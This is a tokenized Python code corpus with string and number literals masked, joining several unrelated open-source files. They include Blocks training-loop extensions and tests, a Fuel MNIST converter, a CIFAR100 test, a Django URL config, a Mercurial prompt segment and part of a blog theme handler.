INTEGER_TRIGGERS = frozenset ( [ "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> def __init__ ( self , ** kwargs ) : <EOL> self . _conditions = [ ] <EOL> super_kwargs = { } <EOL> trigger_keywords = self . BOOLEAN_TRIGGERS | self . INTEGER_TRIGGERS <EOL> conditions = { } <EOL> for key , value in kwargs . items ( ) : <EOL> if key in trigger_keywords : <EOL> conditions [ key ] = value <EOL> else : <EOL> super_kwargs [ key ] = value <EOL> self . set_conditions ( ** conditions ) <EOL> super ( SimpleExtension , self ) . __init__ ( ** super_kwargs ) <EOL> def set_conditions ( self , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> self . 
_conditions [ : ] = [ ] <EOL> predicates = { '<STR_LIT>' : has_done_epochs } <EOL> conditions = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> for key , value in kwargs . items ( ) : <EOL> if value : <EOL> if key in self . BOOLEAN_TRIGGERS : <EOL> self . add_condition ( [ conditions . get ( key , key ) ] , <EOL> predicate = predicates . get ( key , None ) ) <EOL> elif key in self . INTEGER_TRIGGERS : <EOL> predicate = Predicate ( key , value ) <EOL> self . add_condition ( [ conditions . get ( key , key ) ] , <EOL> predicate = predicate ) <EOL> else : <EOL> raise KeyError ( "<STR_LIT>" . format ( key ) ) <EOL> return self <EOL> def add_condition ( self , callbacks_names , predicate = None , arguments = None ) : <EOL> """<STR_LIT>""" <EOL> if not isinstance ( callbacks_names , ( list , tuple ) ) : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> for _callback_name in callbacks_names : <EOL> if not arguments : <EOL> arguments = [ ] <EOL> if not predicate : <EOL> self . _conditions . append ( ( _callback_name , always_true , <EOL> arguments ) ) <EOL> else : <EOL> self . _conditions . append ( ( _callback_name , predicate , <EOL> arguments ) ) <EOL> return self <EOL> @ abstractmethod <EOL> def do ( self , which_callback , * args ) : <EOL> r"""<STR_LIT>""" <EOL> pass <EOL> def dispatch ( self , callback_invoked , * from_main_loop ) : <EOL> """<STR_LIT>""" <EOL> for callback_name , predicate , arguments in self . _conditions : <EOL> if ( callback_name == callback_invoked and <EOL> predicate ( self . main_loop . log ) ) : <EOL> self . 
do ( callback_invoked , * ( from_main_loop + tuple ( arguments ) ) ) <EOL> @ staticmethod <EOL> def parse_args ( which_callback , args ) : <EOL> """<STR_LIT>""" <EOL> args = tuple ( args ) <EOL> if ( which_callback == '<STR_LIT>' or <EOL> which_callback == '<STR_LIT>' ) : <EOL> return ( args [ <NUM_LIT:0> ] , ) , args [ <NUM_LIT:1> : ] <EOL> return ( ) , args <EOL> class FinishAfter ( SimpleExtension ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , ** kwargs ) : <EOL> super ( FinishAfter , self ) . __init__ ( ** kwargs ) <EOL> def do ( self , which_callback , * args ) : <EOL> self . main_loop . log . current_row [ '<STR_LIT>' ] = True <EOL> class Printing ( SimpleExtension ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , ** kwargs ) : <EOL> kwargs . setdefault ( "<STR_LIT>" , True ) <EOL> kwargs . setdefault ( "<STR_LIT>" , True ) <EOL> kwargs . setdefault ( "<STR_LIT>" , True ) <EOL> kwargs . setdefault ( "<STR_LIT>" , True ) <EOL> kwargs . setdefault ( "<STR_LIT>" , True ) <EOL> super ( Printing , self ) . __init__ ( ** kwargs ) <EOL> def _print_attributes ( self , attribute_tuples ) : <EOL> for attr , value in sorted ( attribute_tuples . items ( ) , key = first ) : <EOL> if not attr . startswith ( "<STR_LIT:_>" ) : <EOL> print ( "<STR_LIT:\t>" , "<STR_LIT>" . format ( attr ) , value ) <EOL> def do ( self , which_callback , * args ) : <EOL> log = self . main_loop . log <EOL> print_status = True <EOL> print ( ) <EOL> print ( "<STR_LIT>" . join ( <NUM_LIT> * "<STR_LIT:->" ) ) <EOL> if which_callback == "<STR_LIT>" and log . status [ '<STR_LIT>' ] == <NUM_LIT:0> : <EOL> print ( "<STR_LIT>" ) <EOL> elif which_callback == "<STR_LIT>" : <EOL> print ( "<STR_LIT>" ) <EOL> elif which_callback == "<STR_LIT>" : <EOL> print ( "<STR_LIT>" ) <EOL> elif which_callback == "<STR_LIT>" : <EOL> print ( "<STR_LIT>" ) <EOL> elif which_callback == "<STR_LIT>" : <EOL> print ( "<STR_LIT>" ) <EOL> print_status = False <EOL> print ( "<STR_LIT>" . 
join ( <NUM_LIT> * "<STR_LIT:->" ) ) <EOL> if print_status : <EOL> print ( "<STR_LIT>" ) <EOL> self . _print_attributes ( log . status ) <EOL> print ( "<STR_LIT>" . format ( <EOL> log . status [ '<STR_LIT>' ] ) ) <EOL> self . _print_attributes ( log . current_row ) <EOL> print ( ) <EOL> class ProgressBar ( TrainingExtension ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , ** kwargs ) : <EOL> super ( ProgressBar , self ) . __init__ ( ** kwargs ) <EOL> self . bar = None <EOL> self . iter_count = <NUM_LIT:0> <EOL> def __getstate__ ( self ) : <EOL> state = dict ( self . __dict__ ) <EOL> del state [ '<STR_LIT:bar>' ] <EOL> return state <EOL> def __setstate__ ( self , state ) : <EOL> self . __dict__ . update ( state ) <EOL> self . bar = None <EOL> def get_iter_per_epoch ( self ) : <EOL> """<STR_LIT>""" <EOL> iter_scheme = self . main_loop . data_stream . iteration_scheme <EOL> if hasattr ( iter_scheme , '<STR_LIT>' ) : <EOL> return iter_scheme . num_batches <EOL> elif ( hasattr ( iter_scheme , '<STR_LIT>' ) and <EOL> hasattr ( iter_scheme , '<STR_LIT>' ) ) : <EOL> return iter_scheme . num_examples // iter_scheme . batch_size <EOL> return None <EOL> def create_bar ( self ) : <EOL> """<STR_LIT>""" <EOL> iter_per_epoch = self . get_iter_per_epoch ( ) <EOL> epochs_done = self . main_loop . log . status [ '<STR_LIT>' ] <EOL> if iter_per_epoch is None : <EOL> widgets = [ "<STR_LIT>" . format ( epochs_done ) , <EOL> progressbar . Counter ( ) , '<STR_LIT:U+0020>' , <EOL> progressbar . BouncingBar ( ) , '<STR_LIT:U+0020>' , <EOL> progressbar . Timer ( ) ] <EOL> iter_per_epoch = progressbar . UnknownLength <EOL> else : <EOL> widgets = [ "<STR_LIT>" . format ( epochs_done ) , <EOL> progressbar . Counter ( ) , <EOL> '<STR_LIT>' , progressbar . Percentage ( ) , '<STR_LIT>' , <EOL> progressbar . Bar ( ) , '<STR_LIT:U+0020>' , <EOL> progressbar . Timer ( ) , '<STR_LIT:U+0020>' , progressbar . ETA ( ) ] <EOL> return progressbar . 
ProgressBar ( widgets = widgets , <EOL> max_value = iter_per_epoch ) <EOL> def before_epoch ( self ) : <EOL> self . iter_count = <NUM_LIT:0> <EOL> def after_epoch ( self ) : <EOL> if self . bar is None : <EOL> return <EOL> self . bar . finish ( ) <EOL> self . bar = None <EOL> def before_batch ( self , batch ) : <EOL> if self . bar is None : <EOL> self . bar = self . create_bar ( ) <EOL> self . bar . start ( ) <EOL> self . iter_count += <NUM_LIT:1> <EOL> self . bar . update ( self . iter_count ) <EOL> class Timing ( SimpleExtension ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , ** kwargs ) : <EOL> kwargs . setdefault ( '<STR_LIT>' , True ) <EOL> kwargs . setdefault ( '<STR_LIT>' , True ) <EOL> super ( Timing , self ) . __init__ ( ** kwargs ) <EOL> self . current = { <EOL> level : { '<STR_LIT:train>' : <NUM_LIT:0> , '<STR_LIT>' : <NUM_LIT:0> } <EOL> for level in [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> } <EOL> self . previous = { <EOL> level : { '<STR_LIT:train>' : <NUM_LIT:0> , '<STR_LIT>' : <NUM_LIT:0> } <EOL> for level in [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> } <EOL> def do ( self , which_callback , * args ) : <EOL> current_row = self . main_loop . log . current_row <EOL> profile = self . main_loop . profile . total <EOL> if which_callback == '<STR_LIT>' : <EOL> current_row [ '<STR_LIT>' ] = profile [ ( '<STR_LIT>' , ) ] <EOL> return <EOL> if which_callback == '<STR_LIT>' : <EOL> level = '<STR_LIT>' <EOL> elif which_callback == '<STR_LIT>' : <EOL> level = '<STR_LIT>' <EOL> for action in [ '<STR_LIT:train>' , '<STR_LIT>' ] : <EOL> self . previous [ level ] [ action ] = self . current [ level ] [ action ] <EOL> self . current [ level ] [ action ] = profile [ '<STR_LIT>' , '<STR_LIT>' , action ] <EOL> current_row [ '<STR_LIT>' . format ( action , level ) ] = self . current [ level ] [ action ] - self . previous [ level ] [ action ] <EOL> current_row [ '<STR_LIT>' . format ( action ) ] = self . current [ level ] [ action ] </s>
<s> from __future__ import absolute_import , print_function <EOL> import doctest <EOL> import fnmatch <EOL> import importlib <EOL> import os <EOL> import pkgutil <EOL> import blocks <EOL> import blocks . bricks <EOL> from blocks . utils . testing import skip_if_not_available <EOL> def setup ( testobj ) : <EOL> skip_if_not_available ( modules = [ '<STR_LIT>' ] ) <EOL> testobj . globs [ '<STR_LIT>' ] = absolute_import <EOL> testobj . globs [ '<STR_LIT>' ] = print_function <EOL> def load_tests ( loader , tests , ignore ) : <EOL> for _ , module , _ in pkgutil . walk_packages ( path = blocks . __path__ , <EOL> prefix = blocks . __name__ + '<STR_LIT:.>' ) : <EOL> try : <EOL> tests . addTests ( doctest . DocTestSuite ( <EOL> module = importlib . import_module ( module ) , setUp = setup , <EOL> optionflags = doctest . IGNORE_EXCEPTION_DETAIL ) ) <EOL> except : <EOL> pass <EOL> docs = [ ] <EOL> for root , _ , filenames in os . walk ( os . path . join ( blocks . __path__ [ <NUM_LIT:0> ] , <EOL> '<STR_LIT>' ) ) : <EOL> for doc in fnmatch . filter ( filenames , '<STR_LIT>' ) : <EOL> docs . append ( os . path . abspath ( os . path . join ( root , doc ) ) ) <EOL> tests . addTests ( doctest . DocFileSuite ( <EOL> * docs , module_relative = False , setUp = setup , <EOL> optionflags = doctest . IGNORE_EXCEPTION_DETAIL ) ) <EOL> return tests </s>
<s> import os <EOL> import signal <EOL> import time <EOL> from itertools import count <EOL> from multiprocessing import Process <EOL> from fuel . datasets import IterableDataset <EOL> from mock import MagicMock <EOL> from numpy . testing import assert_raises <EOL> from six . moves import cPickle <EOL> from blocks . main_loop import MainLoop <EOL> from blocks . extensions import TrainingExtension , FinishAfter , Printing <EOL> from blocks . utils import unpack <EOL> from blocks . config import config <EOL> from blocks . utils . testing import MockAlgorithm , MockMainLoop <EOL> class WriteBatchExtension ( TrainingExtension ) : <EOL> """<STR_LIT>""" <EOL> def after_batch ( self , _ ) : <EOL> self . main_loop . log . current_row [ '<STR_LIT>' ] = self . main_loop . algorithm . batch <EOL> def test_main_loop ( ) : <EOL> old_config_profile_value = config . profile <EOL> config . profile = True <EOL> main_loop = MainLoop ( <EOL> MockAlgorithm ( ) , IterableDataset ( range ( <NUM_LIT:10> ) ) . get_example_stream ( ) , <EOL> extensions = [ WriteBatchExtension ( ) , FinishAfter ( after_n_epochs = <NUM_LIT:2> ) ] ) <EOL> main_loop . run ( ) <EOL> assert_raises ( AttributeError , getattr , main_loop , '<STR_LIT>' ) <EOL> assert main_loop . log . status [ '<STR_LIT>' ] == <NUM_LIT:20> <EOL> assert main_loop . log . status [ '<STR_LIT>' ] == [ <NUM_LIT:10> , <NUM_LIT:20> ] <EOL> assert len ( main_loop . log ) == <NUM_LIT:20> <EOL> for i in range ( <NUM_LIT:20> ) : <EOL> assert main_loop . log [ i + <NUM_LIT:1> ] [ '<STR_LIT>' ] == { '<STR_LIT:data>' : i % <NUM_LIT:10> } <EOL> config . profile = old_config_profile_value <EOL> def test_training_resumption ( ) : <EOL> def do_test ( with_serialization ) : <EOL> data_stream = IterableDataset ( range ( <NUM_LIT:10> ) ) . get_example_stream ( ) <EOL> main_loop = MainLoop ( <EOL> MockAlgorithm ( ) , data_stream , <EOL> extensions = [ WriteBatchExtension ( ) , <EOL> FinishAfter ( after_n_batches = <NUM_LIT> ) ] ) <EOL> main_loop . 
run ( ) <EOL> assert main_loop . log . status [ '<STR_LIT>' ] == <NUM_LIT> <EOL> if with_serialization : <EOL> main_loop = cPickle . loads ( cPickle . dumps ( main_loop ) ) <EOL> finish_after = unpack ( <EOL> [ ext for ext in main_loop . extensions <EOL> if isinstance ( ext , FinishAfter ) ] , singleton = True ) <EOL> finish_after . add_condition ( <EOL> [ "<STR_LIT>" ] , <EOL> predicate = lambda log : log . status [ '<STR_LIT>' ] == <NUM_LIT> ) <EOL> main_loop . run ( ) <EOL> assert main_loop . log . status [ '<STR_LIT>' ] == <NUM_LIT> <EOL> assert main_loop . log . status [ '<STR_LIT>' ] == <NUM_LIT:2> <EOL> for i in range ( <NUM_LIT> ) : <EOL> assert main_loop . log [ i + <NUM_LIT:1> ] [ '<STR_LIT>' ] == { "<STR_LIT:data>" : i % <NUM_LIT:10> } <EOL> do_test ( False ) <EOL> do_test ( True ) <EOL> def test_training_interrupt ( ) : <EOL> def process_batch ( batch ) : <EOL> time . sleep ( <NUM_LIT:0.1> ) <EOL> algorithm = MockAlgorithm ( ) <EOL> algorithm . process_batch = process_batch <EOL> main_loop = MockMainLoop ( <EOL> algorithm = algorithm , <EOL> data_stream = IterableDataset ( count ( ) ) . get_example_stream ( ) , <EOL> extensions = [ Printing ( ) ] <EOL> ) <EOL> p = Process ( target = main_loop . run ) <EOL> p . start ( ) <EOL> time . sleep ( <NUM_LIT:0.1> ) <EOL> os . kill ( p . pid , signal . SIGINT ) <EOL> time . sleep ( <NUM_LIT:0.1> ) <EOL> assert p . is_alive ( ) <EOL> os . kill ( p . pid , signal . SIGINT ) <EOL> time . sleep ( <NUM_LIT> ) <EOL> assert not p . is_alive ( ) <EOL> p . join ( ) <EOL> def test_error ( ) : <EOL> ext = TrainingExtension ( ) <EOL> ext . after_batch = MagicMock ( side_effect = KeyError ) <EOL> ext . on_error = MagicMock ( ) <EOL> main_loop = MockMainLoop ( extensions = [ ext , FinishAfter ( after_epoch = True ) ] ) <EOL> assert_raises ( KeyError , main_loop . run ) <EOL> ext . on_error . assert_called_once_with ( ) <EOL> assert '<STR_LIT>' in main_loop . log . current_row <EOL> ext . 
on_error = MagicMock ( side_effect = AttributeError ) <EOL> main_loop = MockMainLoop ( extensions = [ ext , FinishAfter ( after_epoch = True ) ] ) <EOL> assert_raises ( KeyError , main_loop . run ) <EOL> ext . on_error . assert_called_once_with ( ) <EOL> assert '<STR_LIT>' in main_loop . log . current_row </s>
<s> import gzip <EOL> import os <EOL> import struct <EOL> import h5py <EOL> import numpy <EOL> from fuel . converters . base import fill_hdf5_file , check_exists <EOL> MNIST_IMAGE_MAGIC = <NUM_LIT> <EOL> MNIST_LABEL_MAGIC = <NUM_LIT> <EOL> TRAIN_IMAGES = '<STR_LIT>' <EOL> TRAIN_LABELS = '<STR_LIT>' <EOL> TEST_IMAGES = '<STR_LIT>' <EOL> TEST_LABELS = '<STR_LIT>' <EOL> ALL_FILES = [ TRAIN_IMAGES , TRAIN_LABELS , TEST_IMAGES , TEST_LABELS ] <EOL> @ check_exists ( required_files = ALL_FILES ) <EOL> def convert_mnist ( directory , output_directory , output_filename = None , <EOL> dtype = None ) : <EOL> """<STR_LIT>""" <EOL> if not output_filename : <EOL> if dtype : <EOL> output_filename = '<STR_LIT>' . format ( dtype ) <EOL> else : <EOL> output_filename = '<STR_LIT>' <EOL> output_path = os . path . join ( output_directory , output_filename ) <EOL> h5file = h5py . File ( output_path , mode = '<STR_LIT:w>' ) <EOL> train_feat_path = os . path . join ( directory , TRAIN_IMAGES ) <EOL> train_features = read_mnist_images ( train_feat_path , dtype ) <EOL> train_lab_path = os . path . join ( directory , TRAIN_LABELS ) <EOL> train_labels = read_mnist_labels ( train_lab_path ) <EOL> test_feat_path = os . path . join ( directory , TEST_IMAGES ) <EOL> test_features = read_mnist_images ( test_feat_path , dtype ) <EOL> test_lab_path = os . path . join ( directory , TEST_LABELS ) <EOL> test_labels = read_mnist_labels ( test_lab_path ) <EOL> data = ( ( '<STR_LIT:train>' , '<STR_LIT>' , train_features ) , <EOL> ( '<STR_LIT:train>' , '<STR_LIT>' , train_labels ) , <EOL> ( '<STR_LIT:test>' , '<STR_LIT>' , test_features ) , <EOL> ( '<STR_LIT:test>' , '<STR_LIT>' , test_labels ) ) <EOL> fill_hdf5_file ( h5file , data ) <EOL> h5file [ '<STR_LIT>' ] . dims [ <NUM_LIT:0> ] . label = '<STR_LIT>' <EOL> h5file [ '<STR_LIT>' ] . dims [ <NUM_LIT:1> ] . label = '<STR_LIT>' <EOL> h5file [ '<STR_LIT>' ] . dims [ <NUM_LIT:2> ] . label = '<STR_LIT>' <EOL> h5file [ '<STR_LIT>' ] . dims [ <NUM_LIT:3> ] . 
label = '<STR_LIT:width>' <EOL> h5file [ '<STR_LIT>' ] . dims [ <NUM_LIT:0> ] . label = '<STR_LIT>' <EOL> h5file [ '<STR_LIT>' ] . dims [ <NUM_LIT:1> ] . label = '<STR_LIT:index>' <EOL> h5file . flush ( ) <EOL> h5file . close ( ) <EOL> return ( output_path , ) <EOL> def fill_subparser ( subparser ) : <EOL> """<STR_LIT>""" <EOL> subparser . add_argument ( <EOL> "<STR_LIT>" , help = "<STR_LIT>" + <EOL> "<STR_LIT>" , <EOL> choices = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:bool>' ) , type = str , default = None ) <EOL> return convert_mnist <EOL> def read_mnist_images ( filename , dtype = None ) : <EOL> """<STR_LIT>""" <EOL> with gzip . open ( filename , '<STR_LIT:rb>' ) as f : <EOL> magic , number , rows , cols = struct . unpack ( '<STR_LIT>' , f . read ( <NUM_LIT:16> ) ) <EOL> if magic != MNIST_IMAGE_MAGIC : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> array = numpy . frombuffer ( f . read ( ) , dtype = '<STR_LIT>' ) <EOL> array = array . reshape ( ( number , <NUM_LIT:1> , rows , cols ) ) <EOL> if dtype : <EOL> dtype = numpy . dtype ( dtype ) <EOL> if dtype . kind == '<STR_LIT:b>' : <EOL> array = array >= <NUM_LIT> <EOL> elif dtype . kind == '<STR_LIT:f>' : <EOL> array = array . astype ( dtype ) <EOL> array /= <NUM_LIT> <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> return array <EOL> def read_mnist_labels ( filename ) : <EOL> """<STR_LIT>""" <EOL> with gzip . open ( filename , '<STR_LIT:rb>' ) as f : <EOL> magic , _ = struct . unpack ( '<STR_LIT>' , f . read ( <NUM_LIT:8> ) ) <EOL> if magic != MNIST_LABEL_MAGIC : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> array = numpy . frombuffer ( f . read ( ) , dtype = '<STR_LIT>' ) <EOL> array = array . reshape ( array . size , <NUM_LIT:1> ) <EOL> return array </s>
<s> from fuel . downloaders . base import default_downloader <EOL> def fill_subparser ( subparser ) : <EOL> """<STR_LIT>""" <EOL> url = '<STR_LIT>' <EOL> filename = '<STR_LIT>' <EOL> subparser . set_defaults ( urls = [ url ] , filenames = [ filename ] ) <EOL> return default_downloader </s>
<s> import numpy <EOL> from numpy . testing import assert_raises <EOL> from fuel import config <EOL> from fuel . datasets import CIFAR100 <EOL> from fuel . streams import DataStream <EOL> from fuel . schemes import SequentialScheme <EOL> def test_cifar100 ( ) : <EOL> train = CIFAR100 ( ( '<STR_LIT:train>' , ) , load_in_memory = False ) <EOL> assert train . num_examples == <NUM_LIT> <EOL> handle = train . open ( ) <EOL> coarse_labels , features , fine_labels = train . get_data ( handle , <EOL> slice ( <NUM_LIT> , <NUM_LIT> ) ) <EOL> assert features . shape == ( <NUM_LIT:10> , <NUM_LIT:3> , <NUM_LIT:32> , <NUM_LIT:32> ) <EOL> assert coarse_labels . shape == ( <NUM_LIT:10> , <NUM_LIT:1> ) <EOL> assert fine_labels . shape == ( <NUM_LIT:10> , <NUM_LIT:1> ) <EOL> train . close ( handle ) <EOL> test = CIFAR100 ( ( '<STR_LIT:test>' , ) , load_in_memory = False ) <EOL> handle = test . open ( ) <EOL> coarse_labels , features , fine_labels = test . get_data ( handle , <EOL> slice ( <NUM_LIT:0> , <NUM_LIT:10> ) ) <EOL> assert features . shape == ( <NUM_LIT:10> , <NUM_LIT:3> , <NUM_LIT:32> , <NUM_LIT:32> ) <EOL> assert coarse_labels . shape == ( <NUM_LIT:10> , <NUM_LIT:1> ) <EOL> assert fine_labels . shape == ( <NUM_LIT:10> , <NUM_LIT:1> ) <EOL> assert features . dtype == numpy . uint8 <EOL> assert coarse_labels . dtype == numpy . uint8 <EOL> assert fine_labels . dtype == numpy . uint8 <EOL> test . close ( handle ) <EOL> stream = DataStream . default_stream ( <EOL> test , iteration_scheme = SequentialScheme ( <NUM_LIT:10> , <NUM_LIT:10> ) ) <EOL> data = next ( stream . get_epoch_iterator ( ) ) [ <NUM_LIT:1> ] <EOL> assert data . min ( ) >= <NUM_LIT:0.0> and data . max ( ) <= <NUM_LIT:1.0> <EOL> assert data . dtype == config . floatX <EOL> assert_raises ( ValueError , CIFAR100 , ( '<STR_LIT>' , ) ) </s>
<s> from django . conf . urls import patterns , url <EOL> from django . views . generic import TemplateView <EOL> urlpatterns = patterns ( '<STR_LIT>' , <EOL> url ( '<STR_LIT>' , TemplateView . as_view ( template_name = '<STR_LIT>' ) , name = '<STR_LIT>' ) , <EOL> ) </s>
<s> import os <EOL> import subprocess <EOL> def get_hg_status ( ) : <EOL> has_modified_files = False <EOL> has_untracked_files = False <EOL> has_missing_files = False <EOL> p = subprocess . Popen ( [ '<STR_LIT>' , '<STR_LIT:status>' ] , stdout = subprocess . PIPE ) <EOL> output = p . communicate ( ) [ <NUM_LIT:0> ] . decode ( "<STR_LIT:utf-8>" ) <EOL> for line in output . split ( '<STR_LIT:\n>' ) : <EOL> if line == '<STR_LIT>' : <EOL> continue <EOL> elif line [ <NUM_LIT:0> ] == '<STR_LIT:?>' : <EOL> has_untracked_files = True <EOL> elif line [ <NUM_LIT:0> ] == '<STR_LIT:!>' : <EOL> has_missing_files = True <EOL> else : <EOL> has_modified_files = True <EOL> return has_modified_files , has_untracked_files , has_missing_files <EOL> def add_hg_segment ( powerline ) : <EOL> branch = os . popen ( '<STR_LIT>' ) . read ( ) . rstrip ( ) <EOL> if len ( branch ) == <NUM_LIT:0> : <EOL> return False <EOL> bg = Color . REPO_CLEAN_BG <EOL> fg = Color . REPO_CLEAN_FG <EOL> has_modified_files , has_untracked_files , has_missing_files = get_hg_status ( ) <EOL> if has_modified_files or has_untracked_files or has_missing_files : <EOL> bg = Color . REPO_DIRTY_BG <EOL> fg = Color . REPO_DIRTY_FG <EOL> extra = '<STR_LIT>' <EOL> if has_untracked_files : <EOL> extra += '<STR_LIT:+>' <EOL> if has_missing_files : <EOL> extra += '<STR_LIT:!>' <EOL> branch += ( '<STR_LIT:U+0020>' + extra if extra != '<STR_LIT>' else '<STR_LIT>' ) <EOL> return powerline . append ( '<STR_LIT>' % branch , fg , bg ) </s>
<s> import os <EOL> import os . path <EOL> import re <EOL> import shutil <EOL> from base import BaseHandler <EOL> from logic import url_factory <EOL> class CustomizeHandler ( BaseHandler ) : <EOL> def get ( self ) : <EOL> if not self . authenticate ( author = True ) : <EOL> return <EOL> self . display [ "<STR_LIT:user>" ] = self . get_author_user ( ) <EOL> static_path = self . application . settings [ "<STR_LIT>" ] <EOL> global_themes_directory = os . path . join ( static_path , '<STR_LIT>' ) <EOL> local_themes_directory = url_factory . resource_directory ( self , '<STR_LIT>' ) <EOL> local_themes_stem = local_themes_directory [ len ( static_path ) + <NUM_LIT:1> : ] <EOL> self . display [ '<STR_LIT>' ] = [ ] <EOL> if os . path . exists ( local_themes_directory ) : <EOL> local_themes = os . listdir ( local_themes_directory ) <EOL> for theme in local_themes : <EOL> theme_path = os . path . join ( local_themes_directory , theme ) <EOL> css_path = os . path . join ( theme_path , theme + '<STR_LIT>' ) <EOL> if ( not theme . startswith ( '<STR_LIT:.>' ) and os . path . isdir ( theme_path ) and <EOL> os . path . exists ( css_path ) ) : <EOL> self . display [ '<STR_LIT>' ] . append ( { '<STR_LIT:path>' : os . path . join ( <EOL> local_themes_stem , os . path . join ( theme , theme + '<STR_LIT>' ) ) } ) <EOL> local_themes = os . listdir ( global_themes_directory ) <EOL> for theme in local_themes : <EOL> theme_path = os . path . join ( global_themes_directory , theme ) <EOL> css_path = os . path . join ( theme_path , theme + '<STR_LIT>' ) <EOL> if ( not theme . startswith ( '<STR_LIT:.>' ) and os . path . isdir ( theme_path ) and <EOL> os . path . exists ( css_path ) ) : <EOL> self . display [ '<STR_LIT>' ] . append ( { '<STR_LIT:path>' : os . path . join ( '<STR_LIT>' , <EOL> os . path . join ( theme , theme + '<STR_LIT>' ) ) } ) <EOL> if self . display [ "<STR_LIT:user>" ] . theme . find ( '<STR_LIT>' ) != - <NUM_LIT:1> : <EOL> current_theme_path = os . path . 
join ( local_themes_stem , '<STR_LIT>' ) <EOL> default_stylesheet_path = os . path . join ( current_theme_path , <EOL> '<STR_LIT>' ) <EOL> self . display [ '<STR_LIT>' ] . append ( { '<STR_LIT:path>' : default_stylesheet_path } ) <EOL> for theme in self . display [ '<STR_LIT>' ] : <EOL> f = open ( os . path . join ( static_path , theme [ '<STR_LIT:path>' ] ) ) <EOL> theme_data = f . read ( ) <EOL> title = re . search ( r'<STR_LIT>' , theme_data ) <EOL> theme [ '<STR_LIT:title>' ] = ( title . group ( <NUM_LIT:1> ) if <EOL> title and len ( title . groups ( ) ) > <NUM_LIT:1> else '<STR_LIT>' ) <EOL> link = re . search ( r'<STR_LIT>' , theme_data ) <EOL> theme [ '<STR_LIT>' ] = link . group ( <NUM_LIT:1> ) if link and len ( link . groups ( ) ) > <NUM_LIT:0> else '<STR_LIT>' <EOL> author = re . search ( r'<STR_LIT>' , theme_data ) <EOL> theme [ '<STR_LIT>' ] = ( author . group ( <NUM_LIT:1> ) if <EOL> author and len ( author . groups ( ) ) > <NUM_LIT:1> else '<STR_LIT>' ) <EOL> author_link = re . search ( r'<STR_LIT>' , theme_data ) <EOL> theme [ '<STR_LIT>' ] = ( author_link . group ( <NUM_LIT:1> ) if <EOL> author_link and len ( author_link . groups ( ) ) > <NUM_LIT:0> else '<STR_LIT>' ) <EOL> theme [ '<STR_LIT>' ] = os . path . join ( os . path . dirname ( theme [ '<STR_LIT:path>' ] ) , <EOL> '<STR_LIT>' ) <EOL> theme [ '<STR_LIT>' ] = self . application . settings [ "<STR_LIT>" ] <EOL> options = re . findall ( <EOL> r'<STR_LIT>' , theme_data , re . M ) <EOL> for index , option in enumerate ( options ) : <EOL> theme [ '<STR_LIT>' + str ( index ) ] = option <EOL> extra_head_html = re . search ( r'<STR_LIT>' , <EOL> theme_data , re . M | re . DOTALL ) <EOL> theme [ '<STR_LIT>' ] = ( extra_head_html . group ( <NUM_LIT:1> ) . replace ( <EOL> '<STR_LIT:\n>' , '<STR_LIT>' ) if extra_head_html and <EOL> len ( extra_head_html . groups ( ) ) > <NUM_LIT:0> else '<STR_LIT>' ) <EOL> extra_body_end_html = re . search ( <EOL> r'<STR_LIT>' , theme_data , re . M | re . 
DOTALL ) <EOL> theme [ '<STR_LIT>' ] = extra_body_end_html . group ( <NUM_LIT:1> ) . replace ( <EOL> '<STR_LIT:\n>' , '<STR_LIT>' ) if extra_body_end_html and len ( <EOL> extra_body_end_html . groups ( ) ) > <NUM_LIT:0> else '<STR_LIT>' <EOL> if ( ( self . display [ "<STR_LIT:user>" ] . theme . find ( '<STR_LIT>' ) != - <NUM_LIT:1> and <EOL> theme [ '<STR_LIT:path>' ] . find ( '<STR_LIT>' ) != - <NUM_LIT:1> ) <EOL> or self . display [ "<STR_LIT:user>" ] . theme . replace ( '<STR_LIT>' , '<STR_LIT>' ) == <EOL> theme [ '<STR_LIT:path>' ] ) : <EOL> self . display [ '<STR_LIT>' ] = theme <EOL> if re . search ( '<STR_LIT>' , self . display [ "<STR_LIT:user>" ] . theme ) : <EOL> self . display [ '<STR_LIT>' ] = self . display [ "<STR_LIT:user>" ] . theme <EOL> else : <EOL> self . display [ '<STR_LIT>' ] = None <EOL> self . display [ '<STR_LIT>' ] = self . display [ "<STR_LIT:user>" ] . theme . find ( <EOL> '<STR_LIT>' ) != - <NUM_LIT:1> <EOL> f . close ( ) <EOL> self . display [ '<STR_LIT>' ] = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , ] <EOL> self . fill_template ( "<STR_LIT>" ) <EOL> def post ( self ) : <EOL> if not self . authenticate ( author = True ) : <EOL> return <EOL> user = self . get_author_user ( ) <EOL> user . title = self . get_argument ( '<STR_LIT:title>' , '<STR_LIT>' ) <EOL> user . description = self . get_argument ( '<STR_LIT:description>' , '<STR_LIT>' ) <EOL> user . email = self . get_argument ( '<STR_LIT:email>' ) <EOL> user . name = self . get_argument ( '<STR_LIT:name>' , '<STR_LIT>' ) <EOL> user . favicon = url_factory . clean_filename ( self . get_argument ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> user . currency = self . get_argument ( '<STR_LIT>' , '<STR_LIT>' 